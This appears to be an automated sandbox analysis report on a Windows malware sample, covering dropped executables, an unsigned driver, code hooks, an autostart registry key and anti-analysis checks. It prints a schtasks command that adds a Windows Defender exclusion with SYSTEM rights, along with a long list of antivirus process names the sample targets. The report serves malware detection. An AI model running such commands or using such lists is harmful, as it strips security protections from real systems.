Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Section loaded: tbcore3u.dll	Jump to behavior
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Section loaded: devenum.dll	Jump to behavior
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Section loaded: msdmo.dll	Jump to behavior
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Section loaded: tbcore3u.dll
Source: C:\Program Files (x86)\1pZu9Rh\XKXK7Ueky.exe	Section loaded: apphelp.dll
Source: C:\Program Files (x86)\1pZu9Rh\XKXK7Ueky.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\1pZu9Rh\XKXK7Ueky.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\1pZu9Rh\XKXK7Ueky.exe	Section loaded: tbcore3u.dll
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Section loaded: tbcore3u.dll
Source: C:\Program Files (x86)\1pZu9Rh\XKXK7Ueky.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\1pZu9Rh\XKXK7Ueky.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\1pZu9Rh\XKXK7Ueky.exe	Section loaded: tbcore3u.dll

Source: C:\Users\user\Desktop\149876985-734579485.05.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Documents\RgZ5EJ.exe

File written: C:\Users\Public\Music\destopbak.ini

Jump to behavior

Source: 149876985-734579485.05.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: 149876985-734579485.05.exe

Static file information: File size 30939136 > 1048576

Source: 149876985-734579485.05.exe

Static PE information: Raw size of .data is bigger than: 0x100000 < 0x1d5ae00

Source:	Binary string: d:\work\iGiveButton\toolbar4\Release_bin\uninstall.pdb source: RgZ5EJ.exe, 00000006.00000003.2891470624.0000000004008000.00000004.00000020.00020000.00000000.sdmp, YYAfLM.exe, 00000027.00000002.3580652851.0000000001579000.00000004.00000020.00020000.00000000.sdmp, YYAfLM.exe, 00000027.00000002.3580412823.0000000000348000.00000002.00000001.01000000.0000000A.sdmp, YYAfLM.exe, 00000027.00000000.3134169274.0000000000348000.00000002.00000001.01000000.0000000A.sdmp, YYAfLM.exe, 00000027.00000002.3580652851.00000000014EE000.00000004.00000020.00020000.00000000.sdmp, YYAfLM.exe, 00000028.00000000.3158159359.0000000000348000.00000002.00000001.01000000.0000000A.sdmp, YYAfLM.exe, 00000028.00000002.3174404361.0000000000348000.00000002.00000001.01000000.0000000A.sdmp, XKXK7Ueky.exe, 00000029.00000000.3160829714.00000000002C8000.00000002.00000001.01000000.0000000C.sdmp, XKXK7Ueky.exe, 00000029.00000002.3176579274.00000000002C8000.00000002.00000001.01000000.0000000C.sdmp, YYAfLM.exe, 0000002C.00000000.3278091028.0000000000348000.00000002.00000001.01000000.0000000A.sdmp, YYAfLM.exe, 0000002C.00000002.3292548319.0000000000348000.00000002.00000001.01000000.0000000A.sdmp, XKXK7Ueky.exe, 0000002D.00000002.3293558017.00000000002C8000.00000002.00000001.01000000.0000000C.sdmp, XKXK7Ueky.exe, 0000002D.00000000.3280752956.00000000002C8000.00000002.00000001.01000000.0000000C.sdmp, YYAfLM.exe.6.dr, XKXK7Ueky.exe.39.dr
Source:	Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb source: 189atohci.sys.0.dr
Source:	Binary string: y:\avsdk5\engine\make\build\public\64-bit\vseamps.pdb source: RgZ5EJ.exe, 00000004.00000000.2327090820.0000000140014000.00000002.00000001.01000000.00000008.sdmp, RgZ5EJ.exe, 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmp, RgZ5EJ.exe, 00000006.00000000.2686734767.0000000140014000.00000002.00000001.01000000.00000008.sdmp, RgZ5EJ.exe.0.dr

Data Obfuscation

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe

Unpacked PE file: 39.2.YYAfLM.exe.5540000.6.unpack

Source: C:\Users\user\Documents\RgZ5EJ.exe

Code function: 4_2_000000014000F000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

4_2_000000014000F000

Source: initial sample

Static PE information: section where entry point is pointing to: .mo:

Source: tbcore3U.dll.6.dr	Static PE information: section name: .%?.
Source: tbcore3U.dll.6.dr	Static PE information: section name: .%-[
Source: tbcore3U.dll.6.dr	Static PE information: section name: .mo:
Source: tbcore3U.dll.39.dr	Static PE information: section name: .%?.
Source: tbcore3U.dll.39.dr	Static PE information: section name: .%-[
Source: tbcore3U.dll.39.dr	Static PE information: section name: .mo:

Source: C:\Program Files (x86)\1pZu9Rh\XKXK7Ueky.exe

Code function: 41_2_002C2691 push ecx; ret

41_2_002C26A4

Persistence and Installation Behavior

Drops PE files to the document folder of the user

Source: C:\Users\user\Desktop\149876985-734579485.05.exe	File created: C:\Users\user\Documents\vselog.dll			Jump to dropped file
Source: C:\Users\user\Desktop\149876985-734579485.05.exe	File created: C:\Users\user\Documents\RgZ5EJ.exe			Jump to dropped file

Sample is not signed and drops a device driver

Source: C:\Users\user\Desktop\149876985-734579485.05.exe

File created: C:\Windows\System32\drivers\189atohci.sys

Jump to behavior

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior

Source: C:\Users\user\Desktop\149876985-734579485.05.exe	File created: C:\Windows\System32\drivers\189atohci.sys	Jump to dropped file
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	File created: C:\Program Files (x86)\1pZu9Rh\XKXK7Ueky.exe	Jump to dropped file
Source: C:\Users\user\Desktop\149876985-734579485.05.exe	File created: C:\Users\user\Documents\vselog.dll	Jump to dropped file
Source: C:\Users\user\Documents\RgZ5EJ.exe	File created: C:\Program Files (x86)\YYAfLM\tbcore3U.dll	Jump to dropped file
Source: C:\Users\user\Documents\RgZ5EJ.exe	File created: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Jump to dropped file
Source: C:\Users\user\Desktop\149876985-734579485.05.exe	File created: C:\Users\user\Documents\RgZ5EJ.exe	Jump to dropped file
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	File created: C:\Program Files (x86)\1pZu9Rh\tbcore3U.dll	Jump to dropped file

Source: C:\Users\user\Desktop\149876985-734579485.05.exe

File created: C:\Windows\System32\drivers\189atohci.sys

Jump to dropped file

Boot Survival

Creates an undocumented autostart registry key

Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Key value created or modified: HKEY_CURRENT_USER\System\CurrentControlSet\Services\Sauron Groupfenzhu			Jump to behavior
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Key value created or modified: HKEY_CURRENT_USER\System\CurrentControlSet\Services\Sauron Groupfenzhu			Jump to behavior

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"

Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe

Registry key created: HKEY_CURRENT_USER\System\CurrentControlSet\Services\Sauron

Jump to behavior

Source: C:\Users\user\Documents\RgZ5EJ.exe

4_2_0000000140001520

Hooking and other Techniques for Hiding and Protection

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Source: C:\Users\user\Documents\RgZ5EJ.exe	Memory written: PID: 8004 base: 7FFE22370008 value: E9 EB D9 E9 FF	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Memory written: PID: 8004 base: 7FFE2220D9F0 value: E9 20 26 16 00	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Memory written: PID: 7228 base: 7FFE22370008 value: E9 EB D9 E9 FF	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Memory written: PID: 7228 base: 7FFE2220D9F0 value: E9 20 26 16 00	Jump to behavior
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Memory written: PID: 5212 base: 16E0005 value: E9 8B 2F 82 75	Jump to behavior
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Memory written: PID: 5212 base: 76F02F90 value: E9 7A D0 7D 8A	Jump to behavior
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Memory written: PID: 5212 base: 1700005 value: E9 8B 2F 80 75	Jump to behavior
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Memory written: PID: 5212 base: 76F02F90 value: E9 7A D0 7F 8A	Jump to behavior
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Memory written: PID: 5960 base: 1560005 value: E9 8B 2F 9A 75
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Memory written: PID: 5960 base: 76F02F90 value: E9 7A D0 65 8A
Source: C:\Program Files (x86)\1pZu9Rh\XKXK7Ueky.exe	Memory written: PID: 6104 base: 3C0005 value: E9 8B 2F B4 76
Source: C:\Program Files (x86)\1pZu9Rh\XKXK7Ueky.exe	Memory written: PID: 6104 base: 76F02F90 value: E9 7A D0 4B 89
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Memory written: PID: 5436 base: 2F0005 value: E9 8B 2F C1 76
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Memory written: PID: 5436 base: 76F02F90 value: E9 7A D0 3E 89
Source: C:\Program Files (x86)\1pZu9Rh\XKXK7Ueky.exe	Memory written: PID: 5928 base: 26E0005 value: E9 8B 2F 82 74
Source: C:\Program Files (x86)\1pZu9Rh\XKXK7Ueky.exe	Memory written: PID: 5928 base: 76F02F90 value: E9 7A D0 7D 8B

Source: C:\Users\user\Documents\RgZ5EJ.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	API/Special instruction interceptor: Address: 6C65A702
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	API/Special instruction interceptor: Address: 6C573E38
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	API/Special instruction interceptor: Address: 6C51BC04
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	API/Special instruction interceptor: Address: 6C5A87AA
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	API/Special instruction interceptor: Address: 6C686E74
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	API/Special instruction interceptor: Address: 6C5A87B1
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	API/Special instruction interceptor: Address: 6C5B080B
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	API/Special instruction interceptor: Address: 6C558B19
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	API/Special instruction interceptor: Address: 3EDE627
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	API/Special instruction interceptor: Address: 428B637
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	API/Special instruction interceptor: Address: 3EC007F
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	API/Special instruction interceptor: Address: 3E3A400
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	API/Special instruction interceptor: Address: 3FAE5B4
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	API/Special instruction interceptor: Address: 426B700
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	API/Special instruction interceptor: Address: 4220981
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	API/Special instruction interceptor: Address: 6C55A03F
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	API/Special instruction interceptor: Address: 6C679F9E
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	API/Special instruction interceptor: Address: 6C5590FC
Source: C:\Program Files (x86)\1pZu9Rh\XKXK7Ueky.exe	API/Special instruction interceptor: Address: 6BF88092
Source: C:\Program Files (x86)\1pZu9Rh\XKXK7Ueky.exe	API/Special instruction interceptor: Address: 6BF21EB4
Source: C:\Program Files (x86)\1pZu9Rh\XKXK7Ueky.exe	API/Special instruction interceptor: Address: 6BDDBC04
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	API/Special instruction interceptor: Address: 6C6A6565
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	API/Special instruction interceptor: Address: 6C5B2089
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	API/Special instruction interceptor: Address: 6C6B7912
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	API/Special instruction interceptor: Address: 6C5FC0AF
Source: C:\Program Files (x86)\1pZu9Rh\XKXK7Ueky.exe	API/Special instruction interceptor: Address: 6BF05F8C
Source: C:\Program Files (x86)\1pZu9Rh\XKXK7Ueky.exe	API/Special instruction interceptor: Address: 6BE0F12B
Source: C:\Program Files (x86)\1pZu9Rh\XKXK7Ueky.exe	API/Special instruction interceptor: Address: 6BE3FFCB
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	API/Special instruction interceptor: Address: 6C6C8092
Source: C:\Program Files (x86)\1pZu9Rh\XKXK7Ueky.exe	API/Special instruction interceptor: Address: 6BF57C0E
Source: C:\Program Files (x86)\1pZu9Rh\XKXK7Ueky.exe	API/Special instruction interceptor: Address: 6BF09F9E
Source: C:\Program Files (x86)\1pZu9Rh\XKXK7Ueky.exe	API/Special instruction interceptor: Address: 6BE03E38
Source: C:\Program Files (x86)\1pZu9Rh\XKXK7Ueky.exe	API/Special instruction interceptor: Address: 6BE387AA
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	API/Special instruction interceptor: Address: 6C5EF839
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	API/Special instruction interceptor: Address: 6C4CDE34
Source: C:\Program Files (x86)\1pZu9Rh\XKXK7Ueky.exe	API/Special instruction interceptor: Address: 6BD5DE34
Source: C:\Program Files (x86)\1pZu9Rh\XKXK7Ueky.exe	API/Special instruction interceptor: Address: 6BF32F48
Source: C:\Program Files (x86)\1pZu9Rh\XKXK7Ueky.exe	API/Special instruction interceptor: Address: 6BEA8647
Source: C:\Program Files (x86)\1pZu9Rh\XKXK7Ueky.exe	API/Special instruction interceptor: Address: 6BE8C0AF

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: YYAfLM.exe, 00000027.00000002.3582165592.0000000003B7D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: {4E062DDA-444A-A2A8-84CE-E105F66A5AB3}SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEMCONSENTPROMPTBEHAVIORADMINSOFTWARE\PERFRPOOLSOFTWARE\PPFR49/56/235/24;9161POSTDATAC:\WINDOWS\SYSWOW64\DRIVERS\189ATOHCI.SYS360SAFE.EXE360SD.EXE360RP.EXE360RPS.EXESRAGENT.EXE360TRAY.EXEZHUDONGFANGYU.EXEKANKAN.EXESUPERKILLER.EXELIVEUPDATE360.EXEMODULEUPDATE.EXEFILESMASHER.EXEAGREEMENTVIEWER.EXESOFTMGRLITE.EXE360LEAKFIXER.EXE360SDRUN.EXE360SDUPD.EXE360FILEGUARD.EXEDEP360.EXEDUMPUPER.EXEDSMAIN.EXEDSMAIN64.EXEFIRSTAIDBOX.EXECHECKSM.EXEHIPSMAIN.EXEHIPSDAEMON.EXEHIPSTRAY.EXEHRUPDATE.EXEHIPSLOG.EXENETFLOW.EXEAUTORUNS.EXEUSYSDIAG.EXEWSCTRLSVC.EXEWSCTRL.EXEKXEMAIN.EXEKXESCORE.EXEKSCAN.EXEKXECENTER.EXEKXETRAY.EXEKDINFOMGR.EXEKISLIVE.EXEKNEWVIP.EXEKSOFTPURIFIER.EXEKTRASHAUTOCLEAN.EXEKAUTHORITYVIEW.EXETQCLIENT.EXETQEDRNAME.EXETQSAFEUI.EXETQTRAY.EXETRANTORAGENT.EXETQDEFENDER.EXETQUPDATEUI.EXETQWATERMARK.EXEDLPAPPDATA.EXENACLDIS.EXEMSMPENG.EXEMPCMDRUN.EXELDSHELPER.EXELDSSECURITY.EXELDSSECURITYAIDER.EXECOMPUTERZTRAY.EXECOMPUTERCENTER.EXEGUARDHP.EXECOMPUTERZ_CN.EXECOMPUTERZSERVICE.EXECOMPUTERZSERVICE_X64.EXEHDW_DISK_SCAN.EXECOMPUTERZMONHELPER.EXEDRVMGR.EXEWEB_HOST.EXE2345SAFECENTERSVC.EXE2345RTPROTECT.EXE2345SAFESVC.EXE2345MPCSAFE.EXE2345SAFETRAY.EXE2345SAFEUPDATE.EXE2345VIRUSSCAN.EXE2345MANUUPDATE.EXE2345ADRTPROTECT.EXE2345AUTHORITYPROTECT.EXE2345EXTSHELL.EXE2345EXTSHELL64.EXE2345FILESHRE.EXE2345LEAKFIXER.EXE2345LSPFIX.EXE2345PCSAFEBOOTASSISTANT.EXE2345RTPROTECTCENTER.EXE2345SHELLPRO.EXE2345SYSDOCTOR.EXELENOVOPCMANAGERSERVICE.EXELENOVOPCMANAGER.EXELAVSERVICE.EXELENOVOTRAY.EXELNVSVCFDN.EXEWSCTRL7.EXEWSCTRL10.EXEWSCTRL11.EXELENOVOAPPUPDATE.EXELENOVOAPPSTORE.EXEDESKTOPASSISTANTAPP.EXEDESKTOPASSISTANT.EXELENOVOMONITORMANAGER.EXELENOVOOKM.EXELEASHIVE.EXESTARTUPMANAGER.EXEWSPLUGINHOST.EXEWSPLUGINHOST64.EXECRASHPAD_HANDLER.EXESEARCHENGINE.EXELISFSERVICE.EXELSF.EXEAPPVANT.EXELENOVOINTERNETSOFTWAREFRAMEWORK.EXEEMDRIVERASSIST.EXELEAPPOM.EXEHOTFIXPLATFORM.EXEMSPCMANAGER.EXEMSPCMANAGERSERVICE.EXEAVP.EXEAVPUI.EXEAVASTSVC.EXEASWTOOLSSVC.EXEASWIDSAGENT.EXEWSC_PROXY.EXEAVASTUI.EXEAVIRA.SPOTLIGHT.SERVICE.EXEENDPOINTPROTECTION.EXESENTRYEYE.EXEAVIRA.SPOTLIGHT.COMMON.UPDATER.EXEAVIRA.SPOTLIGHT.FALLBACKUPDATER.EXEAVIRA.SPOTLIGHT.UI.APPLICATION.EXEAVIRA.SPOTLIGHT.SYSTRAY.APPLICATION.EXEAVIRA.OPTIMIZERHOST.EXEAVIRA.SPOTLIGHT.BOOTSTRAPPER.EXEAVIRA.SPOTLIGHT.SERVICE.WORKER.EXEAVIRA.SPOTLIGHT.COMMON.UPDATERTRACKER.EXEAVIRA.SPOTLIGHT.UI.APPLICATION.MESSAGING.EXEAVIRA.SPOTLIGHT.UI.ADMINISTRATIVERIGHTSPROVIDER.EXEMFEMMS.EXEMFEVTPS.EXEMCAPEXE.EXEMCSHIELD.EXEMCUICNT.EXEMFEAVSVC.EXENISSRV.EXESECURITYHEALTHSYSTRAY.EXEKWSPROTECT64.EXEQMDL.EXEQMPERSONALCENTER.EXEQQPCPATCH.EXEQQPCREALTIMESPEEDUP.EXEQQPCRTP.EXEQQPCTRAY.EXEQQREPAIR.EXEQQPCMGRUPDATE.EXEKSAFETRAY.EXEMPCOPYACCELERATOR.EXEUNTHREAT.EXEK7TSECURITY.EXEAD-WATCH.EXEPSAFESYSTRAY.EXEVSSERV.EXEREMUPD.EXERTVSCAN.EXEASHDISP.EXEAVCENTER.EXETMBMSRV.EXEKNSDTRAY.EXEV3SVC.EXEMSSECESS.EXEQUHLPSVC.EXERAVMOND.EXEKVMONXP.EXEBAIDUSAFETRAY.EXEBAIDUSD.EXEBKA.EXEBKA
Source: YYAfLM.exe, 00000027.00000002.3582165592.0000000003B7D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: AUTORUNS.EXE

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\149876985-734579485.05.exe	RDTSC instruction interceptor: First address: 140001115 second address: 14000112C instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec eax 0x0000000a mov ecx, eax 0x0000000c nop 0x0000000d nop 0x0000000e dec eax 0x0000000f xor edx, edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 fldpi 0x00000015 frndint 0x00000017 rdtsc
Source: C:\Users\user\Desktop\149876985-734579485.05.exe	RDTSC instruction interceptor: First address: 14000112C second address: 14000112C instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 xor ebx, ebx 0x00000009 dec eax 0x0000000a mov ebx, edx 0x0000000c dec eax 0x0000000d or eax, ebx 0x0000000f dec eax 0x00000010 sub eax, ecx 0x00000012 nop 0x00000013 dec ebp 0x00000014 xor edx, edx 0x00000016 dec esp 0x00000017 mov edx, eax 0x00000019 dec ebp 0x0000001a cmp edx, eax 0x0000001c jc 00007FF8F0C53FF0h 0x0000001e fldpi 0x00000020 frndint 0x00000022 rdtsc
Source: C:\Users\user\Documents\RgZ5EJ.exe	RDTSC instruction interceptor: First address: 586495 second address: 5864A3 instructions: 0x00000000 rdtsc 0x00000002 dec esp 0x00000003 mov ecx, edx 0x00000005 dec ecx 0x00000006 shl ecx, 20h 0x00000009 dec esp 0x0000000a or ecx, eax 0x0000000c frndint 0x0000000e rdtsc

Source: C:\Users\user\Desktop\149876985-734579485.05.exe

Dropped PE file which has not been started: C:\Windows\System32\drivers\189atohci.sys

Jump to dropped file

Source: C:\Users\user\Documents\RgZ5EJ.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess			graph_4-14017
Source: C:\Program Files (x86)\1pZu9Rh\XKXK7Ueky.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep			graph_41-3227

Source: C:\Users\user\Documents\RgZ5EJ.exe

API coverage: 2.7 %

Source: C:\Users\user\Documents\RgZ5EJ.exe TID: 3260	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe TID: 2104	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe TID: 5244	Thread sleep time: -35000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe TID: 1272	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe TID: 5932	Thread sleep time: -30000s >= -30000s	Jump to behavior
